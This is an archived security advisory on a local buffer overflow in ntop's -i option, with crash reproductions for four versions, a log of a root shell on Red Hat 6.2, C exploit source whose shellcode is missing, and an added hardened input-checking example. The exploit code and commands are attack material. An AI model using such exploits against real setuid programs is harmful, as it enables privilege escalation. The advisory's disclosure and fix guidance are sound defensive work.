
Ntop Exploitable Buffer Overflow



    ntop 1.1, ntop 1.2.a7, ntop 1.3.1, ntop 1.3.2


    Christophe Bailleux found the following.  All ntop versions are
    vulnerable to a local buffer overflow attack in their -i option.
    Ntop must be owned by root with the setuid bit set for the attacker
    to gain root privileges.

    a) ntop 1.1

        tshaw:/home/cb/ntop-1.1/$ ./ntop -i `perl -e 'print "A"x208'`
        ntop v.1.1 MT [i686-pc-linux-gnu] listening on AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

        Host      Act   -Rcvd-      Sent       TCP     UDP  ICMP
        Segmentation fault

    b) ntop 1.2a7

        tshaw:/home/cb/ntop-1.2a7$ ./ntop -i `perl -e 'print "A"x109'`
        Segmentation fault

    c) ntop 1.3.1

        tshaw:/home/cb/ntop-1.3.1$ ./ntop -i `perl -e 'print "A"x271'`
        Segmentation fault

    d) ntop 1.3.2

        tshaw:/home/cb/ntop-1.3.2$ ./ntop -i `perl -e 'print "A"x2835'`

        24/Oct/2000:12:32:16 ntop v.1.3.2 MT [i686-pc-linux-gnu] (08/11/00 07:04:32 PM build)
        24/Oct/2000:12:32:16 Listening on
        24/Oct/2000:12:32:16 Copyright 1998-2000 by Luca Deri <>
        24/Oct/2000:12:32:16 Get the freshest ntop from
        24/Oct/2000:12:32:16 Initialising...
        Segmentation fault

    The exploit was tested on Red Hat 6.2 (Zoot), where ntop is
    installed by default with the setuid root bit set:

        [cb@nux cb]$ cat /etc/redhat-release
        Red Hat Linux release 6.2 (Zoot)
        [cb@nux cb]$ rpm -qf /sbin/ntop
        [cb@nux cb]$ id
        uid=535(cb) gid=535(cb) groups=535(cb)
        [cb@nux cb]$ ./expl

        ntop v.1.1 MT [i586-pc-linux-gnu] listening on

        Host        Act   -Rcvd-      Sent    TCP   UDP ICMP
        bash# id
        uid=0(root) gid=535(cb) egid=3(sys) groups=535(cb)
        bash# exit
        [cb@nux cb]$


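    #include <stdlib.h>
    #include <string.h>
    #include <stdio.h>
    #include <unistd.h>   /* execl() */

    #define LEN 208       /* argument length used against ntop 1.1 in a) */

    int main (int argc, char **argv)
    {
      char buf[LEN + 12];
      int  ret = 0xbffffba0;   /* base address; argv[1] is added as an offset */
      int  *p;
      /* The payload string is missing from this archived copy; left empty. */
      char code[] = "";

      if (argc > 1) {
        ret += atoi(argv[1]);
        fprintf(stderr, "Using ret %#010x\n", ret);
      }

      memset(buf, '\x90', LEN);
      memcpy(buf + LEN - strlen(code), code, strlen(code));
      p = (int *) (buf + LEN);
      *p++ = ret;
      *p++ = ret;
      *p   = 0;                /* terminates the argument string */

      execl("./ntop", "ntop", "-i", buf, NULL);
      return 1;                /* reached only if execl() fails */
    }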


    Upgrade to the latest version.
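
    The kind of check that stops an overflow like the one in -i, as an
    added example that is not from the advisory or from ntop's source:
    the interface argument is length- and character-checked before it is
    copied into a fixed buffer.  The function names, the 16-byte limit
    (mirroring Linux IFNAMSIZ) and the allow-list are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed limit: Linux interface names fit in 16 bytes including the NUL
 * (IFNAMSIZ in <net/if.h>); defined locally to keep the example portable. */
#define IFACE_MAX 16

/* Unsafe pattern (illustrative, not ntop source): the number of bytes
 * written is decided by the caller's argument, not by the buffer size. */
void set_iface_unsafe(char *dst, const char *arg)
{
    strcpy(dst, arg);
}

/* Hardened form: reject an argument that is empty, too long, or contains
 * characters outside a conservative allow-list; copy only after all checks.
 * Returns 0 on success, -1 if rejected (dst is left untouched). */
int set_iface_checked(char *dst, size_t dstsize, const char *arg)
{
    size_t n;

    if (dst == NULL || arg == NULL || dstsize == 0)
        return -1;
    for (n = 0; arg[n] != '\0'; n++) {
        unsigned char c = (unsigned char)arg[n];
        if (n + 1 >= dstsize)           /* no room for this byte plus NUL */
            return -1;
        if (!isalnum(c) && c != '.' && c != '_' && c != '-' && c != ':')
            return -1;
    }
    if (n == 0)
        return -1;
    memcpy(dst, arg, n + 1);            /* n + 1 <= dstsize, includes NUL */
    return 0;
}

int main(int argc, char **argv)
{
    char iface[IFACE_MAX];

    if (argc != 2 || set_iface_checked(iface, sizeof iface, argv[1]) != 0) {
        fprintf(stderr, "usage: %s <interface>\n", argv[0]);
        return 1;
    }
    printf("listening on %s\n", iface);
    return 0;
}
```

    With this check, the 208-, 109-, 271- and 2835-byte arguments shown
    in a) to d) are rejected before any copy takes place.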
